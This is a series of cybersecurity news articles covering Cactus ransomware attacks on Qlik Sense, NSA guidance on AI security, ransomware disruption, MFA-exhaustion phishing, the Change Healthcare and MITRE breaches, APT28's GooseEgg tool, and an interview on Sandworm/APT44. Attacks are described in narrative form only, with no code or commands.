In an ongoing campaign that began in November, actors associated with the Cactus ransomware group are exploiting three vulnerabilities in the Qlik Sense data visualization platform to deploy ransomware, and researchers warn that there are thousands of vulnerable instances online at the moment.

The first indications of the activity emerged in November, when researchers observed attackers targeting the Qlik Sense vulnerabilities (CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365) in sporadic attacks. Qlik Sense had released patches for the bugs in August after researchers with Praetorian disclosed them to the vendor. Three months later, the Cactus ransomware attacks began and they all followed a similar pattern, from intrusion to deployment of post-exploitation tools to deployment of the ransomware itself.

“Following exploitation of Qlik Sense installations, the observed execution chain was consistent between all intrusions identified and involves the Qlik Sense Scheduler service (Scheduler.exe) spawning uncommon processes. The threat actors leveraged PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools to establish persistence and ensure remote control,” an analysis by Arctic Wolf from November says.

Among the tools the actors downloaded were MangeEngine UEMS, AnyDesk, and PuTTY Link. The attackers also disabled some security applications, changed admin passwords on compromised systems, and set up an RDP tunnel, which they used for lateral movement. Researchers say the attackers also are feeding false information about their intrusions to victims in an effort to confuse them.

“Since November 2023, the Cactus ransomware group has been actively targeting vulnerable Qlik Sense servers. These attacks are not just about exploiting software vulnerabilities; they also involve a psychological component where Cactus misleads its victims with fabricated stories about the breach. This likely is part of their strategy to obscure their actual method of entry, thus complicating mitigation and response efforts for the affected organizations,” Willem Zeeman and Yun Zheng Hu of Fox IT said in a new analysis of the Cactus ransomware campaign.

Based on a scan from April 17, the Fox IT researchers identified more than 3,100 Qlik Sense servers that are vulnerable to the exploits used by the Cactus ransomware actors. The largest number of vulnerable servers are in the United States.

Cactus is a relatively young ransomware group, having emerged in early 2023. The group typically has exploited bugs in VPN appliances, along with the Qlik Sense servers, to gain initial access to a network. The highest profile intrusion on the group’s scorecard is an attack on Schneider Electric in January.

Organizations running potentially vulnerable Qlik Sense instances can check for the presence of two font files, qle.ttf and qle.woff, as indications of compromise. The attackers use those files, which are not part of the default installation of the server, to store command output.

“When the indicator of compromise artefact is present on a remote Qlik Sense server, it can imply various scenarios. Firstly, it may suggest that remote code execution was carried out on the server, followed by subsequent patching to address the vulnerability (if the server is not vulnerable anymore). Alternatively, its presence could signify a leftover artefact from a previous security incident or unauthorised access,” the Fox IT analysis says.

A recent advisory from the NSA highlighted the ways that operators of national security systems and Defense Industrial Base companies can best securely deploy AI systems that have been designed by third parties.

Last week’s guidance, which comes as companies continue to weigh potential security risks inherent either in AI systems themselves or in how they are deployed, specifically gave recommendations around securely operating AI in the environment and continuously protecting AI systems for vulnerabilities. The advisory marked the first set of guidelines from the Artificial Intelligence Security Center, which was established by the NSA in September in order to help detect and counter AI flaws, develop and promote AI best practices and drive collaborations across the industry relating to AI.

“The rapid adoption, deployment, and use of AI capabilities can make them highly valuable targets for malicious cyber actors,” according to the NSA’s cybersecurity guidance, released jointly with a number of other Five Eyes agencies, including the National Cyber Security Centre and the Australian Signal Dictorate. “Actors, who have historically used data theft of sensitive information and intellectual property to advance their interests, may seek to co-opt deployed AI systems and apply them to malicious ends.”

With organizations typically deploying AI systems within their existing infrastructure, the NSA said that security best practices and requirements also apply to AI systems. Cybersecurity gaps might arise if teams outside of IT are deploying the systems, and the NSA recommended that companies make sure that the person accountable for AI system security is also responsible for the organization’s cybersecurity in general. If organizations outside of IT are operating an AI system, they should work with IT to make sure the system is “within the organization’s risk level” overall. Organizations should also require AI system developers to provide a threat model for their system, which outlines potential threats and mitigations for those threats.

The question of data security and privacy for AI is critical. Companies implementing AI systems should map out all data sources that the organization will use in AI model training, including the list of data sources for models trained by others, though notably, these types of models aren’t typically publicly available. Additionally, security teams should apply existing best practices - like encrypting data at rest, implementing strong authentication mechanisms and ensuring the use of MFA - in the AI deployment environment.

“Do not run models right away in the enterprise environment,” according to the NSA. “Carefully inspect models, especially imported pre-trained models, inside a secure development zone prior to considering them for tuning, training, and deployment. Use organization approved AI-specific scanners, if and when available, for the detection of potential malicious code to assure model validity before deployment.”

The NSA also outlined steps that organizations should take after the initial implementation of AI in order to continuously make sure that data running through the system is secure, including testing the AI model for accuracy and for potential flaws after modifications have been made, evaluating and securing the supply chain for external AI models and data and securing potentially exposed APIs. Metin Kortak, CISO at Rhymetec, said that cybersecurity measures around actively monitoring model behavior are particularly significant because “AI can be unpredictable.”

“Prior to deploying AI systems, companies need to acknowledge and tackle data privacy and security concerns,” said Kortak. “AI systems inherently handle extensive datasets, encompassing sensitive personal and organizational data, rendering them enticing targets for cyber threats.”

While recent coordinated law enforcement efforts have been successful in temporarily knocking down ransomware groups like LockBit and BlackCat, a new report highlighted how the industry as a whole needs to scale disruption efforts against ransomware in order to see effective, long-term impacts.

The report was released Wednesday by the Institute for Security and Technology’s Ransomware Task Force (RTF), a coalition of more than 60 industry, government and law enforcement experts that made 48 recommendations in 2021 aimed at targeting the ransomware threat ecosystem. Though 24 of these 48 recommendations have seen significant progress, the remaining half have still not been fully implemented, and the RTF pinpointed areas where these measures could use further investment and resource allocations from governments, industry and civil society.

It's important to note that law enforcement agencies have carried out varying types of disruptive measures against ransomware groups over the last year, including efforts to target infrastructure, seize backend servers and take down darknet sites, as seen in the Hive and BlackCat disruptions. But more work beyond these efforts is needed, said the RTF report: While these have been temporarily disruptive to ransomware operations, they don’t fully eliminate the issue. The effectiveness of these operations is difficult to measure, for instance, and threat actors behind the groups have in some cases been able to rebuild their infrastructure or reassemble under new names.

“The purpose of disruptions is to throw as much sand in the gears as possible,” said Taylor Grossman, deputy director for digital security at the Institute for Security and Technology, in a video interview with Decipher. “The disruptions we’re seeing are affecting bottom lines. [Ransomware groups are] still active, which is a problem, and they’re still able to reform... so that’s where I think it’s about prioritization and resource allocation, making sure that governments have the manpower and financial resources to throw more people at this problem, to start to disrupt as much as possible.”

The RTF said that in order to better combat ransomware groups, government agencies need to work more closely with industry partners in order to “increase the costs associated with the ransomware profit model.” Part of that partnership should involve more clarity around lawful defensive measures that the private sector can take against ransomware groups, in order to help assuage concerns about legal liability.

“Providing clearer information about how and when companies can protect themselves without fearing later legal repercussions will increase the likelihood that they do so and enhance the defense of the entire ecosystem,” according to the report.

The report also pointed to increased information sharing as another critical piece for ransomware disruption. While cyber incident sharing measures - like CIRCIA and the SEC’s cyber rules - are coming together, the RTF said the government should also create more incentives for voluntary sharing in other areas that touch the ransomware ecosystem. For instance, more information sharing between cryptocurrency entities and law enforcement could lead to valuable insights about cryptocurrency accounts or transactions associated with ransomware actors.

The disruption of ransomware is complex, in part because it involves several stakeholders across the industry - including law enforcement and cybersecurity government agencies, private sector organizations, security researchers and cryptocurrency firms. At the same time, the ransomware threat landscape continues to evolve. A recent report released by Chainalysis in February recorded $1.1 billion in ransomware payments in 2023, a significant increase from the $567 million reported in 2022 and the highest number observed by the firm ever.

With all of these different moving pieces, the RTF called for an overhaul in some of the processes that entities are using to fight ransomware. The U.S. government should rethink how it incentivizes companies to adopt security measures outside of merely providing guidance for them, for instance, and do more to draw attention to the worst ransomware offenders. There should also be more “reciprocal sharing” of information in the partnerships formed around mitigating ransomware, the report said.

“Achieving progress on the remaining 24 RTF recommendations will help address the ransomware threat, and the U.S. and other governments worldwide will need to continue to act going forward,” according to the report. “At the same time, they should work toward driving adoption of secure-by-design and default across the ecosystem.”

Let’s say that, during the middle of a busy day, you receive what looks like a work-related email with a QR code. The email claims to come from a coworker, requesting your help in reviewing a document. You scan the QR code with your phone and it takes you to what looks like a Microsoft 365 sign-in page. You enter your credentials; however, nothing seems to load.

Not thinking much of it, and being a busy day, you continue to go about your work. A couple minutes later a notification buzzes your phone. Not picking it up immediately, another notification comes. Then another, and another after that.

Wondering what’s going on, you grab the phone to find a series of multi-factor authentication (MFA) notifications. You had just attempted to log into Microsoft 365, maybe there was a delay in receiving the MFA notification? You approve one and return to the Microsoft 365 page. The page still hasn’t loaded, so you get back to work and resolve to check it later.

This is very similar to an attack that Cisco Talos Intelligence discusses in their latest Talos Incident Response (IR) Quarterly Report. In this case the Microsoft 365 sign-in page was fake, set up by threat actors. These attackers used compromised credentials to repeatedly attempt to sign in to the company’s real Microsoft 365 page, triggering the series of MFA notifications—an attack technique known as MFA exhaustion. In the end, some employees who were targeted approved the MFA requests and the attackers gained access to these accounts.

More than the annoyance of changing your password

While the use of QR codes is a relatively recent development in phishing, attacks like the one described by Talos have been around for years. Most phishing attacks employ similar social engineering techniques to trick users into turning over their credentials. Phishing is frequently one of the top means of gaining initial access in the Talos Incident Response Quarterly Report.

Attackers hammering MFA-protected accounts is also a concerning development in the identity threat landscape. But sadly, most successful credential compromise attacks occur with accounts that don’t have MFA enabled.

According to this quarter’s Talos IR report, using compromised credentials on valid accounts was one of two top initial access vectors. This aligns with findings from Verizon’s 2023 Data Breach Investigations Report, where the use of compromised credentials was the top first-stage attack (initial access) in 44.7% of breaches.

The silver lining is that this appears to be improving. Early last year, in research published by Oort, now a part of Cisco, found that 40% of accounts in the average company had weak or no MFA in the second half of 2022. Looking at updated telemetry from February 2024, this number has dropped significantly to 15%. The change has a lot to do with wider understanding of identity protection, but also an increase in awareness thanks to an uptick in attacks that have targeted accounts relying on base credentials alone for protection.

How credentials are compromised

Phishing, while one of the most popular methods, isn’t the only way that attackers gather compromised credentials. Attackers often attempt to brute force or password spraying attacks, deploying keyloggers, or dumping credentials.

These are just a few of the techniques that threat actors use to gather credentials. For a more elaborate explanation, Talos recently published an excellent breakdown of how credentials are stolen and used by threat actors that is worth taking a look at.

Not all credentials are created equal

Why might an attacker, who has already gained access to a computer, attempt to gain new credentials? Simply put, not all credentials are created equal.

While an attacker can gain a foothold in a network using an ordinary user account, it’s unlikely they’ll be able to further their attacks due to limited permissions. It’s like having a key that unlocks one door, where what you’re really after is the skeleton key that unlocks all the doors.

That skeleton key would be a high-level access account such as an administrator or system user. Targeting administrators makes sense because their elevated privileges allow an attacker more control of a system. And target them they do. According to Cisco’s telemetry, administrator accounts see three times as many failed logins as a regular user account.

Another resource threat actors target is credentials for accounts that are no longer in use. These dormant accounts tend to be legacy accounts for older systems, accounts for former users that have not been cleared from the directory, or temporary accounts that are no longer needed. Sometimes the accounts can include more than one of the above options, and even include administrative privileges.

Dormant accounts are an often-overlooked security issue. According to Cisco’s telemetry, 39% of the total identities within the average organization have had no activity within the last 30 days. This is a 60% increase from 2022.

Guest accounts are an account type that repeatedly gets overlooked. While a convenient option for temporary, restricted access, these often password-free accounts are frequently left enabled long after they are needed.

And their use is increasing. In February 2024, almost 11% of identities examined are guest accounts— representing a 233% jump from the 3% reported in 2022. While we can only speculate, it is possible that cloud-adoption and remote work contributed to this rise, as enterprises used temporary accounts to stage new services and applications or enable remote workloads in the short-term. The use of temporary accounts is understandable, but if they’re forgotten or ignored, these shortcuts represent a serious risk.

Reducing the impact of compromised credentials

It goes without saying that protecting credentials from being compromised and abused is important. However, eradicating this threat is challenging.

One of the best ways to defend against these attacks is by using MFA. Simply confirming that a user is who they say they are—by checking on another device or communication form—can go a long way towards preventing compromised credentials from being used.

However, it isn’t a silver bullet. There are a few ways that threat actors can sidestep MFA. Some MFA forms, such as those that use SMS, can be manipulated by threat actors. In these cases—frequently referred to as Adversary in the Middle (AitM) attacks—the attacker intercepts the MFA SMS, either through social engineering or by compromising the mobile device. The attacker can then input the MFA SMS when prompted and gain access to the targeted account.

The good news here is that there has been a drop in the use of SMS as a second factor. In 2022, 20% of logins leveraged SMS-based authentication. As of February 2024, this number has declined 66%, to just 6.6% of authentications. That is a tremendous change, and a positive one at that. In addition to AitM attacks, SIM swapping attacks have all but rendered SMS-based authentication checks useless.

This is backed up by research coming from the 2024 Duo Trusted Access Report, where using SMS texts and phone calls as a second factor has dropped to 4.9% of authentications, compared to 22% in 2022.

Going passwordless

If you really want to reduce your reliance on passwords when confirming credentials, passwordless authentication is another option. Passwordless authentication is a group of identity verification methods that don’t rely on passwords at all. Biometrics, security keys, and passcodes from authenticator apps can all be used for passwordless authentication.

Based on the numbers, passwordless is the new trend. In 2022, phishing resistant authentication methods such as passwordless accounted for less than 2% of logins. However, in 2024, Cisco’s telemetry shows this number is climbing, currently representing 20%, or nearly a 10x increase. This is great news, but still highlights a critical point—80% are still not using strong MFA.

Protecting MFA from threat actors

Recall the MFA exhaustion attack Talos described in their latest IR report. Talos’ example does highlight how there are select circumstances where attackers can still get past MFA. A distracted or frustrated user may simply accept a notification just to silence the application.

In this case, user education can go a long way towards preventing these attacks from succeeding, but there is more that can be done. It’s also important to have protections in place to detect unusual identity patterns based on behavior.

To illustrate, let’s look at when the threat actor begins hammering the login with the compromised credentials. Having monitoring in place that can recognize anomalies such as MFA floods, as well as the moment the user gets annoyed and accepts the request, can help to quickly alert to potentially malicious activity.

It’s also important to keep an eye out for other anomalies, such as a user signing in from an unmanaged device in a location that would be impossible for them to reach—say Peculiar, Missouri—given they had just logged in an hour ago from Normal, Illinois.

User identities have become one of the most active battlegrounds in the threat landscape. While having MFA in place is critical, as well as implementing trusted access policies, it’s just as important to monitor logins for strange and anomalous behavior. Doing so can provide a leg up against attackers all the more interested in gaining access using compromised credentials.

Ben Nahorney is a threat intelligence analyst at Cisco.

Two months after the initial disclosure of the ransomware attack on its network, Change Healthcare officials said the company has now determined that the attackers gained access to some protected health information and personally identifiable information “which could cover a substantial proportion of people in America”.

The company has been investigating the intrusion since it was discovered in late February, but most of the available information about the incident focused on the ransomware deployment and the effects on the company’s systems and its downstream partners and customers. The attack crippled much of Change Healthcare’s operations and, because the company handles data, transaction clearing, and payment and claims processing for a huge chunk of the U.S. healthcare industry, caused massive delays for thousands of providers and pharmacies around the country. On Tuesday, Change Healthcare said that its ongoing investigation has now found that the attackers were able to steal files that included both PHI and PII.

“Based on initial targeted data sampling to date, the company has found files containing protected health information (PHI) or personally identifiable information (PII), which could cover a substantial proportion of people in America. To date, the company has not seen evidence of exfiltration of materials such as doctors’ charts or full medical histories among the data,” the statement says.

“The company, along with leading external industry experts, continues to monitor the internet and dark web to determine if data has been published. There were 22 screenshots, allegedly from exfiltrated files, some containing PHI and PII, posted for about a week on the dark web by a malicious threat actor. No further publication of PHI or PII has occurred at this time.”

The attack on Change Healthcare has developed into one of the more potentially damaging and far-reaching such incidents in recent years. Given the depth of the company’s integration into the healthcare ecosystem in the U.S., the effects from the ransomware attack may still be unfolding in the coming months. Many practices, pharmacies, hospitals, and other organizations have experienced significant delays for both claims and payment processing as a result of the incident, and some pharmacy chains were unable to fill prescriptions for some time, as well.

The attack has been attributed to the ALPHV/BlackCat ransomware group, which had been the target of a disruption effort by law enforcement just two months before the Change Healthcare intrusion was discovered. The company said it paid a ransom to the attackers, reportedly $22 million. But some of the stolen data was published online anyway.

Federal regulators and legislators have followed the details of the breach closely, and Andrew Witty, the CEO of Change Healthcare’s parent company, UnitedHealth Group, will testify in a hearing before the House Energy and Commerce Committee on May 1 to discuss the effects of the attack on providers and patients.

“We know this attack has caused concern and been disruptive for consumers and providers and we are committed to doing everything possible to help and provide support to anyone who may need it,” said Witty.

The MITRE Corporation on Friday disclosed a breach impacting one of its collaborative networks used for research, development and prototyping. MITRE said in January attackers had exploited two known Ivanti Connect Secure vulnerabilities in order to deploy sophisticated backdoors and harvest credentials.

MITRE, a nonprofit organization that manages federally funded research and development centers supporting government agencies in cybersecurity, defense, homeland security and more, is only the latest high-profile organization to be hit via Ivanti’s vulnerabilities in its Connect Secure and Policy Secure gateways - the U.S. Cybersecurity and Infrastructure Security Agency (CISA) was another recent target, according to officials. MITRE said that, in its specific incident, the nation-state actor behind the attack first performed reconnaissance before exploiting the Ivanti flaws in one of its VPNs and bypassing its multi-factor authentication measures via session hijacking.

“In April 2024 we confirmed that MITRE was subject to an intrusion into one of our research and prototyping networks," said Lex Crumpton and Charles Clancy with MITRE in a Friday post. "MITRE’s security team immediately began an investigation, cut off all known access to the threat actor, and brought in third-party Digital Forensics Incident Response teams to perform their own independent analysis alongside our in-house experts."

After initial access, attackers were able to move laterally and use a compromised administrator account to dig into the network’s VMware infrastructure. Though MITRE had followed best practices and instructions from Ivanti and the U.S. government to upgrade, replace and harden their Ivanti devices, they did not detect the lateral movement into the VMware infrastructure, said Crumpton and Clancy.

During the course of the incident response, MITRE took various measures, including isolating impacted systems and segments of the network to curb the scope of the attack, improving their monitoring of impacted systems and migrating to new systems.

“We launched multiple streams of forensic analysis to identify the extent of the compromise, the techniques employed by the adversaries, and whether the attack was limited to the research and prototyping network or had spread further,” according to Crumpton and Clancy. “While this process is still underway, and we have a lot more to uncover about how the adversary interacted with our systems, trusted log aggregation was perhaps the most important component to enabling our forensic investigation.”

MITRE said the investigation is ongoing and it is still working to determine the scope of the information potentially compromised. The impacted unclassified MITRE research and development system, called the Networked Experimentation, Research, and Virtualization Environment (NERVE), was launched in 2015 as a way to help researchers better collaborate with external labs and partners. MITRE said there is currently no indication that its core enterprise network or partner systems have been impacted.

The incident shows the continued level of fallout from Ivanti’s flaws, disclosed in January (CVE-2024-21887 and CVE-2023-46805), which have been widely exploited by threat actors and also led to an emergency directive by the U.S. government ordering federal agencies to temporarily disconnect all instances of the appliances from agency networks, perform a factory reset and then rebuild and upgrade them.

Microsoft researchers have discovered a notorious Russian state-backed threat actor using a previously undocumented tool called GooseEgg to steal credentials and escalate privileges after gaining initial access to a new device.

The tool has been in use for at least four years and possibly longer, and it has the ability to exploit a Windows Print Spooler vulnerability (CVE-2022-38028), which wasn’t disclosed until 2022. Actors from a threat group that Microsoft calls Forest Blizzard, which is known more commonly as Fancy Bear or APT28, have deployed GooseEgg in attacks on a variety of targets in Europe and North America in recent years. The tool is relatively simple but is effective and has the ability to launch other apps and move laterally.

“Microsoft has observed Forest Blizzard using GooseEgg as part of post-compromise activities against targets including Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations. While a simple launcher application, GooseEgg is capable of spawning other applications specified at the command line with elevated permissions, allowing threat actors to support any follow-on objectives such as remote code execution, installing a backdoor, and moving laterally through compromised networks,” Microsoft said in a new analysis.

Forest Blizzard is a threat group associated with Russia’s GRU intelligence service and has been active for nearly 15 years. The group generally targets organizations of strategic value for Russia’s foreign policy objectives, including government agencies, technology providers, and higher education institutions.

“Microsoft has observed that, after obtaining access to a target device, Forest Blizzard uses GooseEgg to elevate privileges within the environment. GooseEgg is typically deployed with a batch script, which we have observed using the name execute.bat and doit.bat. This batch script writes the file servtask.bat, which contains commands for saving off/compressing registry hives. The batch script invokes the paired GooseEgg executable and sets up persistence as a scheduled task designed to run servtask.bat,” Microsoft said in its analysis.

“The GooseEgg binary—which has included but is not limited to the file names justice.exe and DefragmentSrv.exe—takes one of four commands, each with different run paths. While the binary appears to launch a trivial given command, in fact the binary does this in a unique and sophisticated manner, likely to help conceal the activity.”

The first command doesn’t do much, but the second and third commands launch the actual exploit for the CVE-2022-38028 vulnerability, and the fourth one checks to make sure the exploit worked. Microsoft researchers said GooseEgg can create a new directory and when the Print Spooler service tries to load a specific driver, it is redirected to the attacker-created directory, where there is a function that has been modified by the attacker.

“This results in the auxiliary DLL wayzgoose.dll launching in the context of the PrintSpooler service with SYSTEM permissions. wayzgoose.dll is a basic launcher application capable of spawning other applications specified at the command line with SYSTEM-level permissions, enabling threat actors to perform other malicious activities such as installing a backdoor, moving laterally through compromised networks, and remotely executing code,” the Microsoft analysis says.

After Mandiant recently “graduated” the notorious Sandworm group into APT44, Decipher’s Lindsey O’Donnell-Welch and Mandiant analysts Dan Black and Gabby Roncone reflect on the most pivotal moments from Sandworm over the last decade, from NotPetya to the Ukraine electric power grid attacks. Below is a lightly edited transcript from the video interview conversation.

Lindsey O’Donnell-Welch: This is Lindsey O'Donnell Welch with Decipher and I'm joined today by two analysts with Mandiant, and we're going to talk about some new research that Mandiant released this week on the Sandworm group, now known as APT44. So here with me today is Dan Black, Mandiant principal analyst with Google Cloud, and Gabby Roncone, Mandiant senior analyst for the advanced practices team with Google Cloud. Dan and Gabby, Sandworm has been around for more than a decade, it's been affiliated with the Russian GRU, but Mandiant this week graduated Sandworm into an official APT group. Can you tell me a little bit about the decision process behind that? The group's been around for fifteen or so years - why now, and what went into that?

Gabby Roncone: Mandiant’s graduation process is this very unique, analytically rigorous process that we do and we've done since APT1, to essentially look back at all of our threat groups that are related to a certain threat actor, and do a rigorous deep dive on each one of those threat groups - try to understand the historical activity that we've seen and the current activity that we're seeing, and tie them together in In order to graduate them into an APT.

This is something that gets kicked off when we believe that a threat group is especially deserving of the higher threat assessment kind of associated with the title. So for us, Sandworm was this group that obviously has been incredibly active over the last ten years, since we've been tracking them, but has been sort of the primary cyber sabotage unit for the Russian military intelligence since the war in Ukraine started. And when we saw sort of the prominent role that Sandworm was taking in Ukraine, and we were also undergoing so much of our own research in Ukraine with incident response engagements and such, we believed that we needed to undergo the graduation process as well, to make sure that our understanding of that group was really as in-depth as it could be. So, we spent over a year going through every single cluster of activity we thought might be related to Sandworm in the past and the present, and we were luckily able to tie those major historical incidents to the group that we are now seeing in Ukraine.

Lindsey O’Donnell-Welch: Can you talk a little bit about the advantages of having an APT designation like this and how it fits into giving threat intelligence that's associated with this group's activities more context in the future?

“The most obvious sort of pivotal moment to me is their movement into wartime operations, but I think that, even though our classification of the Russia war in Ukraine started on February 24, 2022, the really disruptive attacks in Ukraine start after the invasion in 2014.”

Dan Black: Yeah, so I think to reflect a little bit on what Gabby said as well, the process of graduating something from an UNC to maybe a temporary name that we give something - so Sandworm was very much a temporary name that we had designated - you can think of the step to take it to an APT as us reflecting a very deep level of understanding and confidence in what we are talking about, and so this is kind of like the latest stage of a process for us to say “hey this is a very high severity threat, this is something that we have a very refined understanding of and we want to make sure that our customers, the public are understanding that threat in the same way that we are.” So a lot of what we tried to do in this report is write something that will hold the test of time to really contextualize what we've seen from a group over the past decade - its proclivities, its tendencies, what it likes to do, the wide scope of activity that it it partakes in - in hopes that that'll help people understand for their own threat models for the next decade in terms of what to expect, when they should think that they might be in the targeting scope of this group and what they should think about seeing in their networks if that's the case.

Lindsey O’Donnell-Welch: When I'm writing about these threat actors I always like to go down history lane and Sandworm has an absolutely extensive history in part because they've been behind super high-profile attacks. But then also, in the 2010s, it was really crazy to see these types of attacks where the group was using such destructive types of malware. So from your vantage point looking at anything from the Industroyer Ukraine electric power grid attacks to the NotPetya attacks, what have been some of the more pivotal moments over the years of tracking Sandworm from a threat Intel perspective?

Gabby Roncone: I feel like we can both take this one because I feel that we'll maybe have the same answer or maybe we'll have different answers. I feel like with this group everyone sort of picks their own thing that they really enjoy tracking. The most obvious sort of pivotal moment to me is their movement into wartime operations, but I think that, even though our classification of the Russia war in Ukraine started on February 24, 2022, the really disruptive attacks in Ukraine start after the invasion in 2014. A year after the invasion, you have the first blackout with BlackEnergy 2 in the Ukrainian power grid, and then almost exactly a year later you have the next one with Industroyer. It seems like this group has been able to propel itself forward by actioning these really specific high-level mandates that align really strongly with the Russian government interests at the time. And you see them just be active in every single geopolitical event that Russia seems to be having high stakes in. But kind of going off of that, you don't necessarily see the wartime pace of activity and just the rapid adaptation, prior to 2022, that then you do and in war times. So it's been really interesting to see how this group that's sort of been at the forefront of a lot of these novel operations that seem to almost push the line in the sand a little bit for what we see as norms in cyberspace over and over, for the last ten years, and then just suddenly ramping up their efforts very significantly during wartime.

“When you have a group that's moving first, that often means that there's lessons to be learned to identify from what they've done.”

Dan Black: Yeah. If I could reflect on something Gabby kept saying there - “novel,” “first,” “innovative” - all these concepts and the fact that they've often been the first mover in the threat landscape for some of the most brazen and reckless things we've seen. The first group to try to disrupt an energy grid with manual interaction and with custom malware to do that. The first to do this brazen case of digital election interference in 2016 with the U.S. elections, then trying to double down with that in 2017 in the French elections. The petty disruption of the Olympic Games in 2018 because they weren't allowed to participate under their national flag. It's a series of firsts in this space, and the thing that really drove us to want to report on this in-depth is the proliferation risk we see from some of that. When you have a group that's moving first, that often means that there's lessons to be learned to identify from what they've done, and the challenge that we see is when they do those kind of things is that either countries that are developing cyber attack programs, non-state actors who want to cause a little bit of chaos, they have this body of evidence to learn from because they're so forward-leaning in terms of the risk appetite. Their willingness to act is unparalleled. I think when you see other countries talked about in terms of developing cyber attack programs, they tend to do this in a test range or a test environment, something where they can collect the evidence they need but not expose it to the world. It almost seems like you know over the course of ten years, Sandworm/APT44 has participated in what's equivalent to live fire exercises. They've just done it in the real world with no concern for the downstream risks, the second order consequences, of what they're doing. The proliferation risk from this stuff, whether you think about back to 2015 when they first used Industroyer, to some of the stuff that we reported on just last year, about that they used in October 2022, the MicroSCADA, the living off the land attacks against OT technologies, they're the first ones to take these steps and other folks are going to absorb some of those lessons, iterate, adapt from what they've done, and they just make the threat landscape a little bit more dangerous every time they do that.

Gabby Roncone: I think also, one of the things kind of building on Dan's point here, that we found really interesting looking Sandworm’s wiper operations even from the beginning of the war, is that they went from using these wipers that we call multifaceted - so they have different components to them, they can do multiple things outside of wiping - to these pure wipers. And the pure wipers I guess are just wipers that wipe. They aren’t setting persistence, they have no network communications, they're not really doing anything other than to just be a lightweight tool to cause some disruption. But they are also moving into using sort of fake ransomware and you kind of see echoes of ransomware tactics in some of Sandworm's operations too, which I think goes along with the brazenness of the actor, but also that bit of proliferation risk that Dan's talking about. Not only is sandworm learning from ransomware actors that are causing real-time disruption in hospitals, in very high-risk environments, but they're also teaching the APT threat environment how to do that as well. So it's a very interesting situation.

Lindsey O’Donnell-Welch: That is an interesting dynamic. Now in more recent years I know that you guys have done a lot of research into what some of the activities of the group have been especially as it relates to both the war with Ukraine, but then also kind of some of the espionage activities that they've launched even outside of that situation. That was also highlighted in your research this week. One thing that stuck out to me has been this shift a little more towards espionage efforts that was outlined in the research. Can you talk a little bit more about what you're seeing there with the group, because, like you said, there's a lot there in terms of both using destructive malware but then also having these other elements to its attacks and I think espionage is one very interesting area that this group is carved out.

“So it's not necessarily about the enterprise networks that we saw them targeting in the beginning, but really more towards the high value targets of the front lines, ways that they can influence the outcomes of the conflict.”

Dan Black: Yeah I can take a first stab at least so I think one of the interesting things in thinking about Sandworm’s operations or APT44’s operations from the beginning of the war until today, is that Russia's war aims - what they've tried to achieve during the war - have evolved over that time. I think we all understand from reading all the different things that were out there that Russia thought it was going to win a very quick war at the beginning right? They thought that this thing was going to be over in a couple of weeks and so they kind of threw everything against the wall. We saw this mass wave of disruptions, all kinds of different wiper malware being used and a really really high intensity campaign of operations in those opening months of the war. After the first few months, it started to become very apparent that this wasn't going to be a war that was going to end overnight, that it is going to be a longer war, that they were going to have to settle in for the long term. And so in that adjustment, in terms of Putin, Russia, the understanding though that the war aims had fundamentally changed and what they could achieve had changed, we started to see a shift in the types of operations we saw from Sandworm. It's been very instructive to see that as they settled into thinking this is a long war that this wasn't going to be a war that moved rapidly from one front to another, but that the front was going to move inch by inch, that they really settled into thinking about targeting mobile devices about the the platforms, the networks that are being used on the frontline. So it's not necessarily about the enterprise networks that we saw them targeting in the beginning, but really more towards the high value targets of the front lines, ways that they can influence the outcomes of the conflict. And I think they learned very fast that being able to collect that intelligence in different forms from the front lines, that tactical type of intelligence, has a real benefit to the conventional forces. So Russia has this thing they call reconnaissance strike complex, it’s about how you pull data in to be able to support targeting all the different kind of outcomes on the front ends of the battlefield. They've really shifted towards that outcome at this point in time. So I think you know understanding what we're seeing here is really about understanding the different contours of the conflict and how they’ve learned to adapt to innovate, to absorb lessons of how to best support a long war, as their wider war aims changed.

Lindsey O’Donnell-Welch: Yeah, definitely. It’s interesting you mention the context there too because I do feel like there is so much geopolitical history that goes into not just the more recent years but just Sandworm and its activities over the past decade or 15 years. So I'd imagine having a deep knowledge as researchers and analysts of these different pieces of context and understanding the motives behind what Russia is doing or like why it might be doing one thing or the other also plays into a lot of how you view these different activity clusters.

Dan Black: Yeah, you know one other point I would make is that before 2022 we had never seen a high intensity armed conflict like this, with cyber operations supporting it at the scale, the intensity that we've seen, right? And so the change that we've seen from 2022 to 2024 is in part Sandworm learning how to best do that. If there's one thing that's true about this group, it’s that they tend to have more operational experience than anyone because they've been so forward leaning over the years, but the the strategic context of an armed conflict is so different than the things that we've seen the day-to-day, and they really had to change the way they needed to operate to be able to support that environment when they're no longer in a kind of standalone role doing things like NotPetya but trying to support the movements of conventional forces on the ground - very, very different outcomes and no amount of theory is going to make you ready for what's going happen in practice right? There's a steady evolution, adaptation, that learning process that's going on throughout the course of the war, they're doing that and it's our belief that in 2024 they're going to look very different than they did in 2023 as well. That learning process is still ongoing. They were on the defensive in 2023, and Russia's going back on the offensive so that may change the scope and the type of operations that we may see in the future as well.

“There's a steady evolution, adaptation, that learning process that's going on throughout the course of the war, they're doing that and it's our belief that in 2024 they're going to look very different than they did in 2023 as well.”

Lindsey O’Donnell-Welch: In the research that you talked a little bit about the adoption of personas - these identities that essentially is the group creating these identities on Telegram channels or other areas to claim either responsibility for various disruptive wartime operations or to kind of add that extra psychological like emphasis to amplify its attacks and one persona that was mentioned was the CyberArmyofRussia_Reborn. Can you talk a little bit about what you're seeing with these personas and how they've been adopted by Sandworm/ APT44 throughout the research that you've done on them?

Gabby Roncone: So Sandworm/APT44 has been using personas for a very long time. They have always had a really interesting blend of different types of operations that they conduct. So we consider Sandworm/APT44 to be a full spectrum threat actor and what this means is that they conduct disruptive operations, espionage operations, but also these influence operations. And these types of operations often are used to support each other for that psychological effect. With APT44 you might hear the name Guccifer 2.0 and have nightmares about 2016. Using these personas in cyber enabled influence operations allows them to take their operation to a different audience, create additional impacts and really show off their own successes or perceived successes. Those goals, those aims are basically what's happening here but in a different context.

